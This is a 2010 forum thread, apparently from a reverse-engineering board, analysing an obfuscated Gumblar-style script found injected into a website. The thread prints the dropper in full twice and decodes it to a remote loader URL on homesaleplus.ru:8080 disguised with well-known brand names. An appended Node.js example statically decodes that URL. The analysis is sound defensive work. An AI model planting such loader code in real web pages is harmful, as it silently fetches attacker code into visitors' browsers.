
KAV malware naming issue (funny)


cEnginEEr
February 5th, 2010, 07:59

While browsing a website I found KAV got triggered; to see what was happening I downloaded the site and found that a single line of script was our culprit:


<script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');Q236s4ic4454clw.setAttribute('src',  'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script>



KAV (with the latest update) detects this as Trojan-Clicker.JS.Iframe.cz; just to see what was wrong with this script, I rearranged the code into a more formatted style:


<script>/*CODE1*/ 
    try{
        window.onload = function(){
            var Q236s4ic4454clw = document.createElement('script');
            Q236s4ic4454clw.setAttribute('type', 'text/javascript');
            Q236s4ic4454clw.setAttribute('id', 'myscript1');
            Q236s4ic4454clw.setAttribute('src',  'h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$'.replace(/\(|\!|&|#|\$|\)|@|\^/ig, ''));
            Q236s4ic4454clw.setAttribute('defer', 'defer');
            document.body.appendChild(Q236s4ic4454clw);
        }
    } catch(e) {}
</script>

To my surprise, this time KAV detected it as Trojan.JS.Agent.axe; can anyone explain this?


bilbo
February 6th, 2010, 01:20

If you google for "Q236s4ic4454clw" (the variable name), you will find at least 12600 home pages infected by the JavaScript "virus" you submitted.

Some more info here:
http://www.symantec.com/connect/blogs/new-obfuscated-scripts-wild-lgpl
http://justcoded.com/article/gumblar-family-virus-removal-tool/

The "virus", per se, simply redirects your browser to another location.

Deobfuscating it is very simple.
The key to everything is in

replace(/\(|\!|&|#|\$|\)|@|\^/ig, '')
which means: replace, with nothing, the eight characters ( ! & # $ ) @ ^

Removing them from the previous string with your preferred editor, you will obtain the link:


'http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/'

Best regards, bilbo


evaluator
February 6th, 2010, 13:06
why won't that link work? i'm crying..

Woodmann
February 6th, 2010, 21:55
Nice use of legit domain names to try and fool.
What is the real "payload" ?

Woodmann

bilbo
February 7th, 2010, 00:51

In my case, Firefox with "Block reported attack sites" ON, the site is blocked by the browser, and asking for further info brings you to the interesting google link


http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/



If you bypass the warning, further stuff from www.stopbadware.org appears, retrieved from the link 
http://en-us.malware-error.mozilla.com/?hl=en-US&url=http%3A%2F%2Fclicksor-com.eastmoney.com.mobile-de.homesaleplus.ru%3A8080%2Focn.ne.jp%2Focn.ne.jp%2Fclassmates.com%2Flinkhelper.cn%2Fgoogle.com%2F

but the real site actually returns a 404 error, so it seems gone...



Best regards, bilbo


evaluator
February 7th, 2010, 05:59
The last one is the real address, which doesn't work:
homesaleplus.ru:8080
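As an added example (not code from the thread or from either poster), here is the deobfuscation bilbo describes and the real-host-versus-decoys split evaluator points at, done statically in Node.js so none of the dropper's JavaScript is ever executed. It assumes the two "&amp" artifacts the forum rendering left in the string are restored to plain "&", and it treats the last two host labels as the registrable domain instead of consulting the Public Suffix List.

```javascript
// Added example, not from the thread: statically recover the URL the dropper
// builds, without executing any attacker JavaScript, then separate the host
// that really resolves from the labels and path segments that only look like
// well-known sites. Node.js, no dependencies.

// Constructed sample: the one-line dropper from the first post. The forum's
// rendering turned two '&' into '&amp' (before "saleplus" and "classmates");
// they are restored to plain '&' here so the string decodes cleanly.
const OBFUSCATED_SRC = "h(t)!^t^))p#@:&&/(##/&$#c^$$l^@)(i&(c$^)k))#$s^o$#r!^)^-$$$&c@$o#^m$!#.#&(e((a!!s)(@t)&m((o@^^n!$!e&^&(y$#).#&c$@o$@!$^m(##(.@m@o@(b(^i&#l#!@e@)@&(-(d)&(e^&@(.))@&h)@@@o^^@m!e#&&s)a#$$l$$#e^@!p^@l&@u#((^s^#@(.$)r$$u(:!$8!$0&$&8)@$0$!)/!o#&@c##@@n(@^!.))n@e@.)&j!@^#$p#/)^@o^c^n)((.()n^)e^$.@!)$j!!^(p#!/@&c^(l&(a&s(^s@!m^@a($^t#e!#^@)s$.^c^&#o((&m&/)(&@l&()i(@n)(k$@h&e)@$(l)$p^!e)$!$r$#.)&c!&n($@/$g#o^@&o!$$g$^l^&#@e$.&&!c#o@$$m(/$$";
const SAMPLE_SCRIPT =
  "<script>/*CODE1*/ try{window.onload = function(){var Q236s4ic4454clw = document.createElement('script');" +
  "Q236s4ic4454clw.setAttribute('type', 'text/javascript');Q236s4ic4454clw.setAttribute('id', 'myscript1');" +
  "Q236s4ic4454clw.setAttribute('src',  '" + OBFUSCATED_SRC + "'.replace(/\\(|\\!|&|#|\\$|\\)|@|\\^/ig, ''));" +
  "Q236s4ic4454clw.setAttribute('defer', 'defer');document.body.appendChild(Q236s4ic4454clw);}} catch(e) {}</script>";

// Locate the `'<noise>'.replace(/<pattern>/<flags>, '')` idiom in the page
// text and apply it with a RegExp built from the captured pieces. Only the
// regex literal is taken from the attacker's code; nothing is eval()ed.
const SRC_BUILDER = /setAttribute\('src',\s*'([^']*)'\.replace\(\/((?:\\.|[^\/])+)\/([a-z]*),\s*''\)\)/;

function decodeSrc(pageText) {
  const m = SRC_BUILDER.exec(pageText);
  if (!m) return null;                       // idiom not present: nothing to decode
  const [, noisy, pattern, flags] = m;
  return noisy.replace(new RegExp(pattern, flags), '');
}

// Split a decoded URL into the host DNS actually has to answer for and the
// parts that merely resemble known brands. Assumes a two-label registrable
// domain (true for .ru here); a production tool would use the Public Suffix List.
function analyzeUrl(url) {
  const u = new URL(url);
  const labels = u.hostname.split('.');
  return {
    realHost: labels.slice(-2).join('.'),               // e.g. homesaleplus.ru
    decoyLabels: labels.slice(0, -2),                   // subdomains chosen to look familiar
    port: u.port,
    decoyPath: u.pathname.split('/').filter(Boolean),   // path segments are never hostnames
  };
}
```

To run it stand-alone, append `console.log(analyzeUrl(decodeSrc(SAMPLE_SCRIPT)))` and execute with node.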